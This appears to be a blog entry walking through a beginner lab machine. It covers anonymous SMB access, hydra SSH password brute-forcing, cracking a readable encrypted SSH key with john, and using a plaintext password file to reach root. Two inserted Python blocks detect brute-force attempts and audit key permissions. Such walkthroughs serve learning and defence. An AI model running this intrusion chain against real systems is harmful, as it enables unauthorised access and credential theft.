Update 11 June 2021
CAP
I did CAP from HTB. It’s active so no writeup. It’s probably the easiest modern HTB machine I’ve done. No new releases from VulnHub lately. I also did Basic Pentesting and yes it was basic.
We have SSH, SMB and a web server. We have anonymous access to the SMB share and can pull a username from it; the note on the share hints that staff upload files there, but that's not something we end up using:
┌──(root💀kali)-[/opt/thm/basic]
└─# smbclient -L //10.10.142.44
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
┌──(root💀kali)-[/opt/thm/basic]
└─# smbclient //10.10.142.44/Anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 19 13:31:20 2018
.. D 0 Thu Apr 19 13:13:06 2018
staff.txt N 173 Thu Apr 19 13:29:55 2018
14318640 blocks of size 1024. 10822624 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
┌──(root💀kali)-[/opt/thm/basic]
└─# cat staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
With our username, we can brute-force SSH:
┌──(root💀kali)-[/opt/thm/basic]
└─# hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.142.44
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-11 07:37:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.142.44:22/
[STATUS] 172.00 tries/min, 172 tries in 00:01h, 14344228 to do in 1389:57h, 16 active
[STATUS] 112.33 tries/min, 337 tries in 00:03h, 14344063 to do in 2128:12h, 16 active
[STATUS] 105.71 tries/min, 740 tries in 00:07h, 14343660 to do in 2261:24h, 16 active
[22][ssh] host: 10.10.142.44 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-11 07:45:02
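An added example (mine, not from the writeup): a small detector for the kind of SSH password guessing hydra was doing above, run over a constructed auth.log excerpt. It assumes classic syslog-style sshd "Failed password" lines and a made-up attacker address 10.10.14.7; at hydra's 16 parallel tasks and roughly 170 tries a minute, a threshold of 10 failures in a 60-second window fires within seconds.

```python
import re
from collections import defaultdict
from datetime import datetime

# Classic syslog-style sshd line (the constructed sample below follows this shape):
# "Jun 11 07:37:41 basic2 sshd[1234]: Failed password for jan from 10.10.14.7 port 51234 ssh2"
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)

def parse_failures(lines):
    """Yield (timestamp, user, ip) for every failed-password line."""
    for line in lines:
        m = FAILED_RE.match(line.strip())
        if m:
            # syslog timestamps carry no year; pin one so they can be compared
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=2021)
            yield ts, m.group("user"), m.group("ip")

def detect_bruteforce(lines, threshold=10, window_seconds=60):
    """Map source IP -> (total failures, users tried) for every IP that racks up
    `threshold` failures inside any `window_seconds` sliding window."""
    events = defaultdict(list)
    for ts, user, ip in parse_failures(lines):
        events[ip].append((ts, user))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = (len(evs), sorted({u for _, u in evs}))
                break
    return hits

def sample_log():
    """Constructed auth.log excerpt: a 20-guess burst against jan, plus benign noise."""
    lines = [f"Jun 11 07:37:{41 + i // 2:02d} basic2 sshd[{1200 + i}]: Failed password for jan "
             f"from 10.10.14.7 port {51000 + i} ssh2" for i in range(20)]
    lines.append("Jun 11 07:38:10 basic2 sshd[1300]: Failed password for kay from 192.168.56.102 port 40000 ssh2")
    lines.append("Jun 11 07:45:02 basic2 sshd[1301]: Accepted password for jan from 10.10.14.7 port 51999 ssh2")
    return lines

if __name__ == "__main__":
    for ip, (count, users) in detect_bruteforce(sample_log()).items():
        print(f"{ip}: {count} failed logins, users tried: {users}")
```

On a real box the same burst is what fail2ban keys on; the single failure from 192.168.56.102 stays below the threshold and is not reported.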
From there we can SSH in as Jan. We can read files in Kay's home, including her (encrypted) SSH private key, which we can then crack and use to log in as Kay:
# on the box
jan@basic2:/home/kay/.ssh$ ls -lash
total 20K
4.0K drwxr-xr-x 2 kay kay 4.0K Apr 23 2018 .
4.0K drwxr-xr-x 5 kay kay 4.0K Apr 23 2018 ..
4.0K -rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
4.0K -rw-r--r-- 1 kay kay 3.3K Apr 19 2018 id_rsa
4.0K -rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN
# key goes here, cut for brevity
jan@basic2:/home/kay/.ssh$
# in kali
┌──(root💀kali)-[/opt/thm/basic]
└─# locate ssh2john
/usr/share/john/ssh2john.py
┌──(root💀kali)-[/opt/thm/basic]
└─# python /usr/share/john/ssh2john.py key > key.john
┌──(root💀kali)-[/opt/thm/basic]
└─# john key.john -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (key)
1g 0:00:00:03 DONE (2021-06-11 07:48) 0.2695g/s 3865Kp/s 3865Kc/s 3865KC/sa6_123..*7¡Vamos!
Session completed
┌──(root💀kali)-[/opt/thm/basic]
└─# chmod 600 key
┌──(root💀kali)-[/opt/thm/basic]
└─# ssh -i key kay@10.10.142.44
Enter passphrase for key 'key':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2
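An added example (mine, not part of the writeup): an audit that walks home directories for SSH private keys readable by group or others, which is exactly how jan could copy kay's 0644 id_rsa above, and reports whether each one at least has a passphrase. The sample home tree is constructed in a temp directory with a dummy, non-functional key body.

```python
import os
import stat
import tempfile

def is_private_key(path):
    """True if the file starts with a PEM/OpenSSH private-key banner."""
    try:
        with open(path, "rb") as f:
            head = f.read(64)
    except OSError:
        return False
    return head.startswith(b"-----BEGIN") and b"PRIVATE KEY" in head

def key_is_encrypted(path):
    """True if a PEM key has a passphrase ('Proc-Type: 4,ENCRYPTED', as on kay's key)."""
    with open(path, "rb") as f:
        return b"Proc-Type: 4,ENCRYPTED" in f.read(256)

def audit_private_keys(home_root):
    """List (path, mode, encrypted) for every private key readable by group or others."""
    findings = []
    for dirpath, _dirs, files in os.walk(home_root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not is_private_key(path):
                continue
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            if mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append((path, oct(mode), key_is_encrypted(path)))
    return findings

def build_sample_home():
    """Constructed fixture: kay's key world-readable (0644) like on the box, jan's 0600."""
    root = tempfile.mkdtemp(prefix="home_")
    dummy_key = (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                 b"DEK-Info: AES-128-CBC,00\nDUMMYKEYMATERIALNOTAREALKEY\n"
                 b"-----END RSA PRIVATE KEY-----\n")
    for user, mode in (("kay", 0o644), ("jan", 0o600)):
        ssh_dir = os.path.join(root, user, ".ssh")
        os.makedirs(ssh_dir)
        key_path = os.path.join(ssh_dir, "id_rsa")
        with open(key_path, "wb") as f:
            f.write(dummy_key)
        os.chmod(key_path, mode)
    return root

if __name__ == "__main__":
    for path, mode, enc in audit_private_keys(build_sample_home()):
        print(f"{path}: mode {mode}, passphrase-protected={enc}")
```

The ssh client refuses to use a key file with such loose bits (the "permissions are too open" error), which is why the writeup ran chmod 600 on its copy; the same 600 on the key and 700 on ~/.ssh is the fix on the box, and a passphrase only helps if it is not in rockyou.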
Kay's home holds a password backup in pass.bak, and with that password sudo gives us root:
kay@basic2:~$ ls -lash
total 48K
4.0K drwxr-xr-x 5 kay kay 4.0K Apr 23 2018 .
4.0K drwxr-xr-x 4 root root 4.0K Apr 19 2018 ..
4.0K -rw------- 1 kay kay 756 Apr 23 2018 .bash_history
4.0K -rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
4.0K -rw-r--r-- 1 kay kay 3.7K Apr 17 2018 .bashrc
4.0K drwx------ 2 kay kay 4.0K Apr 17 2018 .cache
4.0K -rw------- 1 root kay 119 Apr 23 2018 .lesshst
4.0K drwxrwxr-x 2 kay kay 4.0K Apr 23 2018 .nano
4.0K -rw------- 1 kay kay 57 Apr 23 2018 pass.bak
4.0K -rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
4.0K drwxr-xr-x 2 kay kay 4.0K Apr 23 2018 .ssh
0 -rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
4.0K -rw------- 1 root kay 538 Apr 23 2018 .viminfo
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$ sudo -l
[sudo] password for kay:
Matching Defaults entries for kay on basic2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kay may run the following commands on basic2:
(ALL : ALL) ALL
kay@basic2:~$ sudo su
root@basic2:/home/kay# cd /root
root@basic2:~# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
basic2
Fri Jun 11 07:50:04 EDT 2021
root@basic2:~#
Now I’ve got to go watch the footy. Man I’m really phoning in these writeups.